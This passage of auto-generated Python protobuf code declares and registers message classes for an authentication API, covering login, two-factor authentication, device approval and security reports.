_REMOVEAPPSHARESREQUEST = DESCRIPTOR.message_types_by_name['RemoveAppSharesRequest']
_APPSHAREADD = DESCRIPTOR.message_types_by_name['AppShareAdd']
_APPSHARE = DESCRIPTOR.message_types_by_name['AppShare']
_ADDAPPCLIENTREQUEST = DESCRIPTOR.message_types_by_name['AddAppClientRequest']
_REMOVEAPPCLIENTSREQUEST = DESCRIPTOR.message_types_by_name['RemoveAppClientsRequest']
_ADDEXTERNALSHAREREQUEST = DESCRIPTOR.message_types_by_name['AddExternalShareRequest']
_APPCLIENT = DESCRIPTOR.message_types_by_name['AppClient']
_GETAPPINFOREQUEST = DESCRIPTOR.message_types_by_name['GetAppInfoRequest']
_APPINFO = DESCRIPTOR.message_types_by_name['AppInfo']
_GETAPPINFORESPONSE = DESCRIPTOR.message_types_by_name['GetAppInfoResponse']
_APPLICATIONSUMMARY = DESCRIPTOR.message_types_by_name['ApplicationSummary']
_GETAPPLICATIONSSUMMARYRESPONSE = DESCRIPTOR.message_types_by_name['GetApplicationsSummaryResponse']
_GETVERIFICATIONTOKENREQUEST = DESCRIPTOR.message_types_by_name['GetVerificationTokenRequest']
_GETVERIFICATIONTOKENRESPONSE = DESCRIPTOR.message_types_by_name['GetVerificationTokenResponse']
_SENDSHAREINVITEREQUEST = DESCRIPTOR.message_types_by_name['SendShareInviteRequest']
_TIMELIMITEDACCESSREQUEST = DESCRIPTOR.message_types_by_name['TimeLimitedAccessRequest']
_TIMELIMITEDACCESSRESPONSE = DESCRIPTOR.message_types_by_name['TimeLimitedAccessResponse']
_REQUESTDOWNLOADREQUEST = DESCRIPTOR.message_types_by_name['RequestDownloadRequest']
_REQUESTDOWNLOADRESPONSE = DESCRIPTOR.message_types_by_name['RequestDownloadResponse']
_DOWNLOAD = DESCRIPTOR.message_types_by_name['Download']
_DELETEUSERREQUEST = DESCRIPTOR.message_types_by_name['DeleteUserRequest']
ApiRequest = _reflection.GeneratedProtocolMessageType('ApiRequest', (_message.Message,), {
'DESCRIPTOR' : _APIREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApiRequest)
})
_sym_db.RegisterMessage(ApiRequest)
ApiRequestPayload = _reflection.GeneratedProtocolMessageType('ApiRequestPayload', (_message.Message,), {
'DESCRIPTOR' : _APIREQUESTPAYLOAD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApiRequestPayload)
})
_sym_db.RegisterMessage(ApiRequestPayload)
Transform = _reflection.GeneratedProtocolMessageType('Transform', (_message.Message,), {
'DESCRIPTOR' : _TRANSFORM,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Transform)
})
_sym_db.RegisterMessage(Transform)
DeviceRequest = _reflection.GeneratedProtocolMessageType('DeviceRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceRequest)
})
_sym_db.RegisterMessage(DeviceRequest)
AuthRequest = _reflection.GeneratedProtocolMessageType('AuthRequest', (_message.Message,), {
'DESCRIPTOR' : _AUTHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AuthRequest)
})
_sym_db.RegisterMessage(AuthRequest)
NewUserMinimumParams = _reflection.GeneratedProtocolMessageType('NewUserMinimumParams', (_message.Message,), {
'DESCRIPTOR' : _NEWUSERMINIMUMPARAMS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.NewUserMinimumParams)
})
_sym_db.RegisterMessage(NewUserMinimumParams)
PreLoginRequest = _reflection.GeneratedProtocolMessageType('PreLoginRequest', (_message.Message,), {
'DESCRIPTOR' : _PRELOGINREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PreLoginRequest)
})
_sym_db.RegisterMessage(PreLoginRequest)
LoginRequest = _reflection.GeneratedProtocolMessageType('LoginRequest', (_message.Message,), {
'DESCRIPTOR' : _LOGINREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginRequest)
})
_sym_db.RegisterMessage(LoginRequest)
DeviceResponse = _reflection.GeneratedProtocolMessageType('DeviceResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceResponse)
})
_sym_db.RegisterMessage(DeviceResponse)
Salt = _reflection.GeneratedProtocolMessageType('Salt', (_message.Message,), {
'DESCRIPTOR' : _SALT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Salt)
})
_sym_db.RegisterMessage(Salt)
TwoFactorChannel = _reflection.GeneratedProtocolMessageType('TwoFactorChannel', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORCHANNEL,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorChannel)
})
_sym_db.RegisterMessage(TwoFactorChannel)
StartLoginRequest = _reflection.GeneratedProtocolMessageType('StartLoginRequest', (_message.Message,), {
'DESCRIPTOR' : _STARTLOGINREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.StartLoginRequest)
})
_sym_db.RegisterMessage(StartLoginRequest)
LoginResponse = _reflection.GeneratedProtocolMessageType('LoginResponse', (_message.Message,), {
'DESCRIPTOR' : _LOGINRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginResponse)
})
_sym_db.RegisterMessage(LoginResponse)
SsoUserInfo = _reflection.GeneratedProtocolMessageType('SsoUserInfo', (_message.Message,), {
'DESCRIPTOR' : _SSOUSERINFO,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SsoUserInfo)
})
_sym_db.RegisterMessage(SsoUserInfo)
PreLoginResponse = _reflection.GeneratedProtocolMessageType('PreLoginResponse', (_message.Message,), {
'DESCRIPTOR' : _PRELOGINRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PreLoginResponse)
})
_sym_db.RegisterMessage(PreLoginResponse)
LoginAsUserRequest = _reflection.GeneratedProtocolMessageType('LoginAsUserRequest', (_message.Message,), {
'DESCRIPTOR' : _LOGINASUSERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginAsUserRequest)
})
_sym_db.RegisterMessage(LoginAsUserRequest)
LoginAsUserResponse = _reflection.GeneratedProtocolMessageType('LoginAsUserResponse', (_message.Message,), {
'DESCRIPTOR' : _LOGINASUSERRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginAsUserResponse)
})
_sym_db.RegisterMessage(LoginAsUserResponse)
ValidateAuthHashRequest = _reflection.GeneratedProtocolMessageType('ValidateAuthHashRequest', (_message.Message,), {
'DESCRIPTOR' : _VALIDATEAUTHHASHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ValidateAuthHashRequest)
})
_sym_db.RegisterMessage(ValidateAuthHashRequest)
TwoFactorChannelInfo = _reflection.GeneratedProtocolMessageType('TwoFactorChannelInfo', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORCHANNELINFO,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorChannelInfo)
})
_sym_db.RegisterMessage(TwoFactorChannelInfo)
TwoFactorDuoStatus = _reflection.GeneratedProtocolMessageType('TwoFactorDuoStatus', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORDUOSTATUS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorDuoStatus)
})
_sym_db.RegisterMessage(TwoFactorDuoStatus)
TwoFactorAddRequest = _reflection.GeneratedProtocolMessageType('TwoFactorAddRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORADDREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorAddRequest)
})
_sym_db.RegisterMessage(TwoFactorAddRequest)
TwoFactorRenameRequest = _reflection.GeneratedProtocolMessageType('TwoFactorRenameRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORRENAMEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorRenameRequest)
})
_sym_db.RegisterMessage(TwoFactorRenameRequest)
TwoFactorAddResponse = _reflection.GeneratedProtocolMessageType('TwoFactorAddResponse', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORADDRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorAddResponse)
})
_sym_db.RegisterMessage(TwoFactorAddResponse)
TwoFactorDeleteRequest = _reflection.GeneratedProtocolMessageType('TwoFactorDeleteRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORDELETEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorDeleteRequest)
})
_sym_db.RegisterMessage(TwoFactorDeleteRequest)
TwoFactorListResponse = _reflection.GeneratedProtocolMessageType('TwoFactorListResponse', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORLISTRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorListResponse)
})
_sym_db.RegisterMessage(TwoFactorListResponse)
TwoFactorUpdateExpirationRequest = _reflection.GeneratedProtocolMessageType('TwoFactorUpdateExpirationRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORUPDATEEXPIRATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorUpdateExpirationRequest)
})
_sym_db.RegisterMessage(TwoFactorUpdateExpirationRequest)
TwoFactorValidateRequest = _reflection.GeneratedProtocolMessageType('TwoFactorValidateRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORVALIDATEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorValidateRequest)
})
_sym_db.RegisterMessage(TwoFactorValidateRequest)
TwoFactorValidateResponse = _reflection.GeneratedProtocolMessageType('TwoFactorValidateResponse', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORVALIDATERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorValidateResponse)
})
_sym_db.RegisterMessage(TwoFactorValidateResponse)
TwoFactorSendPushRequest = _reflection.GeneratedProtocolMessageType('TwoFactorSendPushRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORSENDPUSHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorSendPushRequest)
})
_sym_db.RegisterMessage(TwoFactorSendPushRequest)
License = _reflection.GeneratedProtocolMessageType('License', (_message.Message,), {
'DESCRIPTOR' : _LICENSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.License)
})
_sym_db.RegisterMessage(License)
OwnerlessRecord = _reflection.GeneratedProtocolMessageType('OwnerlessRecord', (_message.Message,), {
'DESCRIPTOR' : _OWNERLESSRECORD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.OwnerlessRecord)
})
_sym_db.RegisterMessage(OwnerlessRecord)
OwnerlessRecords = _reflection.GeneratedProtocolMessageType('OwnerlessRecords', (_message.Message,), {
'DESCRIPTOR' : _OWNERLESSRECORDS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.OwnerlessRecords)
})
_sym_db.RegisterMessage(OwnerlessRecords)
UserAuthRequest = _reflection.GeneratedProtocolMessageType('UserAuthRequest', (_message.Message,), {
'DESCRIPTOR' : _USERAUTHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserAuthRequest)
})
_sym_db.RegisterMessage(UserAuthRequest)
UidRequest = _reflection.GeneratedProtocolMessageType('UidRequest', (_message.Message,), {
'DESCRIPTOR' : _UIDREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UidRequest)
})
_sym_db.RegisterMessage(UidRequest)
DeviceUpdateRequest = _reflection.GeneratedProtocolMessageType('DeviceUpdateRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEUPDATEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceUpdateRequest)
})
_sym_db.RegisterMessage(DeviceUpdateRequest)
RegisterDeviceInRegionRequest = _reflection.GeneratedProtocolMessageType('RegisterDeviceInRegionRequest', (_message.Message,), {
'DESCRIPTOR' : _REGISTERDEVICEINREGIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RegisterDeviceInRegionRequest)
})
_sym_db.RegisterMessage(RegisterDeviceInRegionRequest)
RegistrationRequest = _reflection.GeneratedProtocolMessageType('RegistrationRequest', (_message.Message,), {
'DESCRIPTOR' : _REGISTRATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RegistrationRequest)
})
_sym_db.RegisterMessage(RegistrationRequest)
ConvertUserToV3Request = _reflection.GeneratedProtocolMessageType('ConvertUserToV3Request', (_message.Message,), {
'DESCRIPTOR' : _CONVERTUSERTOV3REQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ConvertUserToV3Request)
})
_sym_db.RegisterMessage(ConvertUserToV3Request)
RevisionResponse = _reflection.GeneratedProtocolMessageType('RevisionResponse', (_message.Message,), {
'DESCRIPTOR' : _REVISIONRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RevisionResponse)
})
_sym_db.RegisterMessage(RevisionResponse)
ChangeEmailRequest = _reflection.GeneratedProtocolMessageType('ChangeEmailRequest', (_message.Message,), {
'DESCRIPTOR' : _CHANGEEMAILREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeEmailRequest)
})
_sym_db.RegisterMessage(ChangeEmailRequest)
ChangeEmailResponse = _reflection.GeneratedProtocolMessageType('ChangeEmailResponse', (_message.Message,), {
'DESCRIPTOR' : _CHANGEEMAILRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeEmailResponse)
})
_sym_db.RegisterMessage(ChangeEmailResponse)
EmailVerificationLinkResponse = _reflection.GeneratedProtocolMessageType('EmailVerificationLinkResponse', (_message.Message,), {
'DESCRIPTOR' : _EMAILVERIFICATIONLINKRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EmailVerificationLinkResponse)
})
_sym_db.RegisterMessage(EmailVerificationLinkResponse)
SecurityData = _reflection.GeneratedProtocolMessageType('SecurityData', (_message.Message,), {
'DESCRIPTOR' : _SECURITYDATA,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityData)
})
_sym_db.RegisterMessage(SecurityData)
SecurityDataRequest = _reflection.GeneratedProtocolMessageType('SecurityDataRequest', (_message.Message,), {
'DESCRIPTOR' : _SECURITYDATAREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityDataRequest)
})
_sym_db.RegisterMessage(SecurityDataRequest)
SecurityReportIncrementalData = _reflection.GeneratedProtocolMessageType('SecurityReportIncrementalData', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTINCREMENTALDATA,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportIncrementalData)
})
_sym_db.RegisterMessage(SecurityReportIncrementalData)
SecurityReport = _reflection.GeneratedProtocolMessageType('SecurityReport', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReport)
})
_sym_db.RegisterMessage(SecurityReport)
SecurityReportSaveRequest = _reflection.GeneratedProtocolMessageType('SecurityReportSaveRequest', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTSAVEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportSaveRequest)
})
_sym_db.RegisterMessage(SecurityReportSaveRequest)
SecurityReportRequest = _reflection.GeneratedProtocolMessageType('SecurityReportRequest', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportRequest)
})
_sym_db.RegisterMessage(SecurityReportRequest)
SecurityReportResponse = _reflection.GeneratedProtocolMessageType('SecurityReportResponse', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportResponse)
})
_sym_db.RegisterMessage(SecurityReportResponse)
ReusedPasswordsRequest = _reflection.GeneratedProtocolMessageType('ReusedPasswordsRequest', (_message.Message,), {
'DESCRIPTOR' : _REUSEDPASSWORDSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ReusedPasswordsRequest)
})
_sym_db.RegisterMessage(ReusedPasswordsRequest)
SummaryConsoleReport = _reflection.GeneratedProtocolMessageType('SummaryConsoleReport', (_message.Message,), {
'DESCRIPTOR' : _SUMMARYCONSOLEREPORT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SummaryConsoleReport)
})
_sym_db.RegisterMessage(SummaryConsoleReport)
ChangeToKeyTypeOne = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOne', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOne)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOne)
ChangeToKeyTypeOneRequest = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOneRequest', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOneRequest)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOneRequest)
ChangeToKeyTypeOneStatus = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOneStatus', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONESTATUS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOneStatus)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOneStatus)
ChangeToKeyTypeOneResponse = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOneResponse', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOneResponse)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOneResponse)
SetKey = _reflection.GeneratedProtocolMessageType('SetKey', (_message.Message,), {
'DESCRIPTOR' : _SETKEY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SetKey)
})
_sym_db.RegisterMessage(SetKey)
SetKeyRequest = _reflection.GeneratedProtocolMessageType('SetKeyRequest', (_message.Message,), {
'DESCRIPTOR' : _SETKEYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SetKeyRequest)
})
_sym_db.RegisterMessage(SetKeyRequest)
CreateUserRequest = _reflection.GeneratedProtocolMessageType('CreateUserRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATEUSERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.CreateUserRequest)
})
_sym_db.RegisterMessage(CreateUserRequest)
NodeEnforcementAddOrUpdateRequest = _reflection.GeneratedProtocolMessageType('NodeEnforcementAddOrUpdateRequest', (_message.Message,), {
'DESCRIPTOR' : _NODEENFORCEMENTADDORUPDATEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.NodeEnforcementAddOrUpdateRequest)
})
_sym_db.RegisterMessage(NodeEnforcementAddOrUpdateRequest)
NodeEnforcementRemoveRequest = _reflection.GeneratedProtocolMessageType('NodeEnforcementRemoveRequest', (_message.Message,), {
'DESCRIPTOR' : _NODEENFORCEMENTREMOVEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.NodeEnforcementRemoveRequest)
})
_sym_db.RegisterMessage(NodeEnforcementRemoveRequest)
ApiRequestByKey = _reflection.GeneratedProtocolMessageType('ApiRequestByKey', (_message.Message,), {
'DESCRIPTOR' : _APIREQUESTBYKEY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApiRequestByKey)
})
_sym_db.RegisterMessage(ApiRequestByKey)
MemcacheRequest = _reflection.GeneratedProtocolMessageType('MemcacheRequest', (_message.Message,), {
'DESCRIPTOR' : _MEMCACHEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MemcacheRequest)
})
_sym_db.RegisterMessage(MemcacheRequest)
MemcacheResponse = _reflection.GeneratedProtocolMessageType('MemcacheResponse', (_message.Message,), {
'DESCRIPTOR' : _MEMCACHERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MemcacheResponse)
})
_sym_db.RegisterMessage(MemcacheResponse)
MasterPasswordReentryRequest = _reflection.GeneratedProtocolMessageType('MasterPasswordReentryRequest', (_message.Message,), {
'DESCRIPTOR' : _MASTERPASSWORDREENTRYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MasterPasswordReentryRequest)
})
_sym_db.RegisterMessage(MasterPasswordReentryRequest)
DeviceRegistrationRequest = _reflection.GeneratedProtocolMessageType('DeviceRegistrationRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEREGISTRATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceRegistrationRequest)
})
_sym_db.RegisterMessage(DeviceRegistrationRequest)
DeviceVerificationRequest = _reflection.GeneratedProtocolMessageType('DeviceVerificationRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEVERIFICATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceVerificationRequest)
})
_sym_db.RegisterMessage(DeviceVerificationRequest)
DeviceVerificationResponse = _reflection.GeneratedProtocolMessageType('DeviceVerificationResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICEVERIFICATIONRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceVerificationResponse)
})
_sym_db.RegisterMessage(DeviceVerificationResponse)
DeviceApprovalRequest = _reflection.GeneratedProtocolMessageType('DeviceApprovalRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEAPPROVALREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceApprovalRequest)
})
_sym_db.RegisterMessage(DeviceApprovalRequest)
DeviceApprovalResponse = _reflection.GeneratedProtocolMessageType('DeviceApprovalResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICEAPPROVALRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceApprovalResponse)
})
_sym_db.RegisterMessage(DeviceApprovalResponse)
ApproveDeviceRequest = _reflection.GeneratedProtocolMessageType('ApproveDeviceRequest', (_message.Message,), {
'DESCRIPTOR' : _APPROVEDEVICEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApproveDeviceRequest)
})
_sym_db.RegisterMessage(ApproveDeviceRequest)
EnterpriseUserAliasRequest = _reflection.GeneratedProtocolMessageType('EnterpriseUserAliasRequest', (_message.Message,), {
'DESCRIPTOR' : _ENTERPRISEUSERALIASREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EnterpriseUserAliasRequest)
})
_sym_db.RegisterMessage(EnterpriseUserAliasRequest)
EnterpriseUserAddAliasRequest = _reflection.GeneratedProtocolMessageType('EnterpriseUserAddAliasRequest', (_message.Message,), {
'DESCRIPTOR' : _ENTERPRISEUSERADDALIASREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EnterpriseUserAddAliasRequest)
})
_sym_db.RegisterMessage(EnterpriseUserAddAliasRequest)
Device = _reflection.GeneratedProtocolMessageType('Device', (_message.Message,), {
'DESCRIPTOR' : _DEVICE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Device)
})
_sym_db.RegisterMessage(Device)
RegisterDeviceDataKeyRequest = _reflection.GeneratedProtocolMessageType('RegisterDeviceDataKeyRequest', (_message.Message,), {
'DESCRIPTOR' : _REGISTERDEVICEDATAKEYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RegisterDeviceDataKeyRequest)
})
_sym_db.RegisterMessage(RegisterDeviceDataKeyRequest)
ValidateCreateUserVerificationCodeRequest = _reflection.GeneratedProtocolMessageType('ValidateCreateUserVerificationCodeRequest', (_message.Message,), {
'DESCRIPTOR' : _VALIDATECREATEUSERVERIFICATIONCODEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ValidateCreateUserVerificationCodeRequest)
})
_sym_db.RegisterMessage(ValidateCreateUserVerificationCodeRequest)
ValidateDeviceVerificationCodeRequest = _reflection.GeneratedProtocolMessageType('ValidateDeviceVerificationCodeRequest', (_message.Message,), {
'DESCRIPTOR' : _VALIDATEDEVICEVERIFICATIONCODEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ValidateDeviceVerificationCodeRequest)
})
_sym_db.RegisterMessage(ValidateDeviceVerificationCodeRequest)
SendSessionMessageRequest = _reflection.GeneratedProtocolMessageType('SendSessionMessageRequest', (_message.Message,), {
'DESCRIPTOR' : _SENDSESSIONMESSAGEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SendSessionMessageRequest)
})
_sym_db.RegisterMessage(SendSessionMessageRequest)
GlobalUserAccount = _reflection.GeneratedProtocolMessageType('GlobalUserAccount', (_message.Message,), {
'DESCRIPTOR' : _GLOBALUSERACCOUNT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GlobalUserAccount)
})
_sym_db.RegisterMessage(GlobalUserAccount)
AccountUsername = _reflection.GeneratedProtocolMessageType('AccountUsername', (_message.Message,), {
'DESCRIPTOR' : _ACCOUNTUSERNAME,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AccountUsername)
})
_sym_db.RegisterMessage(AccountUsername)
SsoServiceProviderRequest = _reflection.GeneratedProtocolMessageType('SsoServiceProviderRequest', (_message.Message,), {
'DESCRIPTOR' : _SSOSERVICEPROVIDERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SsoServiceProviderRequest)
})
_sym_db.RegisterMessage(SsoServiceProviderRequest)
SsoServiceProviderResponse = _reflection.GeneratedProtocolMessageType('SsoServiceProviderResponse', (_message.Message,), {
'DESCRIPTOR' : _SSOSERVICEPROVIDERRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SsoServiceProviderResponse)
})
_sym_db.RegisterMessage(SsoServiceProviderResponse)
UserSettingRequest = _reflection.GeneratedProtocolMessageType('UserSettingRequest', (_message.Message,), {
'DESCRIPTOR' : _USERSETTINGREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserSettingRequest)
})
_sym_db.RegisterMessage(UserSettingRequest)
ThrottleState = _reflection.GeneratedProtocolMessageType('ThrottleState', (_message.Message,), {
'DESCRIPTOR' : _THROTTLESTATE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ThrottleState)
})
_sym_db.RegisterMessage(ThrottleState)
ThrottleState2 = _reflection.GeneratedProtocolMessageType('ThrottleState2', (_message.Message,), {
'DESCRIPTOR' : _THROTTLESTATE2,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ThrottleState2)
})
_sym_db.RegisterMessage(ThrottleState2)
DeviceInformation = _reflection.GeneratedProtocolMessageType('DeviceInformation', (_message.Message,), {
'DESCRIPTOR' : _DEVICEINFORMATION,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceInformation)
})
_sym_db.RegisterMessage(DeviceInformation)
UserSetting = _reflection.GeneratedProtocolMessageType('UserSetting', (_message.Message,), {
'DESCRIPTOR' : _USERSETTING,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserSetting)
})
_sym_db.RegisterMessage(UserSetting)
UserDataKeyRequest = _reflection.GeneratedProtocolMessageType('UserDataKeyRequest', (_message.Message,), {
